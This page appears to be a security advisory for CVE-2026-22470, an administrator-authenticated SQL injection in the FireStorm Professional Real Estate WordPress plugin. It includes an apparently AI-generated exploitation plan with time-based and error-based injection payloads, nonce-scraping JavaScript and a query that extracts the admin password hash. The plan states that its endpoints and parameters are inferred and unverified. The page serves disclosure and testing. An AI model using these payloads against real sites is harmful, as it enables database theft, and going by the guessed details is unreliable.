CVE-2026-22470

FireStorm Professional Real Estate <= 2.7.11 - Authenticated (Administrator+) SQL Injection

mediumImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
4.9
CVSS Score
4.9
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The FireStorm Professional Real Estate plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.7.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=2.7.11
PublishedJanuary 6, 2026
Last updatedJanuary 14, 2026
Affected pluginfs-real-estate-plugin
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-22470 ## 1. Vulnerability Summary The **FireStorm Professional Real Estate** plugin for WordPress (versions <= 2.7.11) is vulnerable to an **Authenticated SQL Injection** (Administrator+). The vulnerability exists due to the plugin's failure to use `$wpdb->pr…

Show full research plan

Exploitation Research Plan - CVE-2026-22470

1. Vulnerability Summary

The FireStorm Professional Real Estate plugin for WordPress (versions <= 2.7.11) is vulnerable to an **Authenticated SQL Injection** (Administrator+). The vulnerability exists due to the plugin's failure to use $wpdb->prepare() or adequate escaping (like absint() or esc_sql()) on user-supplied parameters before incorporating them into SQL queries. Although it requires high privileges (Administrator), it allows for the extraction of sensitive database information, including password hashes from the wp_users table or sensitive configuration data from wp_options.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php or an admin page via wp-admin/admin.php.
  • Action/Hook: Likely a wp_ajax_ handler used for property management, listing filtering, or a dashboard view registered via add_menu_page.
  • Vulnerable Parameter: (Inferred) Likely an id, listing_id, orderby, or search parameter within an administrative management function.
  • Authentication: Requires an active session with Administrator (or higher) capabilities.
  • Preconditions: The plugin must be active. The attacker must have a valid administrator login.

3. Code Flow

Since source files were not provided, the following flow is inferred based on common patterns in the "fs-real-estate-plugin" slug:

  1. Entry Point: An administrator interacts with the "Properties" or "Listings" menu in the WordPress dashboard.
  2. Request: The browser sends a request to wp-admin/admin.php?page=firestorm-real-estate-listings&property_id=[PAYLOAD] or an AJAX request with action=fs_get_listing_details&id=[PAYLOAD].
  3. Handler Registration: The plugin registers an admin menu callback (e.g., add_submenu_page(..., 'fs_property_listings_callback')) or an AJAX action (add_action('wp_ajax_fs_manage_listing', ...)).
  4. Data Processing: The handler retrieves input via $_GET['id'] or $_POST['property_id'].
  5. SQL Sink: The input is concatenated directly into a query:
    $property_id = $_GET['id']; // Missing sanitization
    $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}fs_properties WHERE id = " . $property_id);
    
  6. Execution: $wpdb->get_results() executes the tainted query against the database.

4. Nonce Acquisition Strategy

Administrative actions in FireStorm are likely protected by WordPress nonces.

  1. Identify Shortcode/Admin Page: Navigate to the main listing page.
    • wp-admin/admin.php?page=fs-real-estate-properties (inferred slug).
  2. Navigate and Extract:
    • Use browser_navigate to load the admin listing page.
    • The plugin likely localizes script data. Check for a variable like fs_admin_params or fs_ajax_nonce.
  3. Verification Tooling:
    • Execute JS via browser_eval:
      // Common pattern for this plugin's localization
      window.fs_real_estate_admin?.nonce || 
      document.querySelector('input[name="fs_nonce"]')?.value ||
      document.querySelector('#_wpnonce')?.value
      
  4. Note: If the vulnerability is in a GET request on an admin page that doesn't verify nonces (common in "read" operations), this step may be bypassed.

5. Exploitation Strategy

We will use Error-Based SQL Injection (using updatexml) or UNION-Based Extraction if the results are reflected.

Step 1: Authentication

Login as an administrator and store cookies.

# Handled by the execution agent's environment

Step 2: Determine Injection Point

Test for a basic time-delay to confirm the sink.

  • Target URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Payload: action=fs_manage_listing&id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)

Step 3: Extract Sensitive Data (PoC)

Using updatexml to leak the database version.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=fs_manage_listing&id=1 AND updatexml(1,concat(0x7e,@@version),1)&_wpnonce=[NONCE]
    

Step 4: Extract Admin Password Hash

  • Payload:
    1 AND updatexml(1,concat(0x7e,(SELECT SUBSTRING(user_pass,1,30) FROM wp_users WHERE ID=1)),1)
    

6. Test Data Setup

  1. Plugin Installation: Ensure fs-real-estate-plugin is installed and active.
  2. Listing Creation: Add at least one property listing to the database to ensure the query returns data if needed.
    wp post create --post_type=fs_property --post_title="Test Property" --post_status=publish
    
  3. User Creation: Ensure an administrator user exists.
    wp user create attacker admin@example.com --role=administrator --user_pass=password
    

7. Expected Results

  • Time-based: The HTTP response should be delayed by exactly 5 seconds.
  • Error-based: The response body should contain a database error message such as:
    XPATH syntax error: '~10.6.18-MariaDB' (indicating the version).
  • Data Extraction: The first 30 characters of the admin's password hash will be visible in the error message.

8. Verification Steps

After performing the HTTP request, verify the version or data using wp-cli:

# Verify DB version matches the leaked version
wp db query "SELECT VERSION();"

# Verify the password hash matches the leaked hash
wp db query "SELECT user_pass FROM wp_users WHERE ID=1;"

9. Alternative Approaches

  • Blind Boolean: If errors are suppressed, use AND 1=1 and AND 1=2 and observe differences in the property listing table or AJAX response.
  • ORDER BY Injection: If the id parameter is safe, check the orderby parameter:
    orderby=(SELECT 1 FROM (SELECT(SLEEP(5)))a)
  • Page Slug: If admin-ajax.php is not the entry point, check wp-admin/admin.php?page=firestorm_settings&id=1'. (Verify the page slug via wp plugin get fs-real-estate-plugin).
Research Findings
Static analysis — not yet PoC-verified

Summary

The FireStorm Professional Real Estate plugin for WordPress is vulnerable to authenticated SQL injection in versions up to and including 2.7.11 due to the improper handling of user-supplied parameters in administrative database queries. This vulnerability allows an attacker with administrator-level access to execute arbitrary SQL commands, potentially leading to the extraction of sensitive information such as user password hashes from the database.

Exploit Outline

To exploit this vulnerability, an attacker must be authenticated as an Administrator. The attack involves targeting an administrative endpoint, typically `wp-admin/admin-ajax.php` or an admin settings page, that accepts parameters (such as an 'id') used in SQL queries without sanitization. By injecting a crafted payload, such as `1 AND updatexml(1,concat(0x7e,@@version),1)`, into the vulnerable parameter, the attacker can leverage error-based or time-based injection to leak sensitive data. If security nonces are utilized by the plugin, the attacker must first retrieve a valid nonce from the dashboard's page source before submitting the malicious request.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.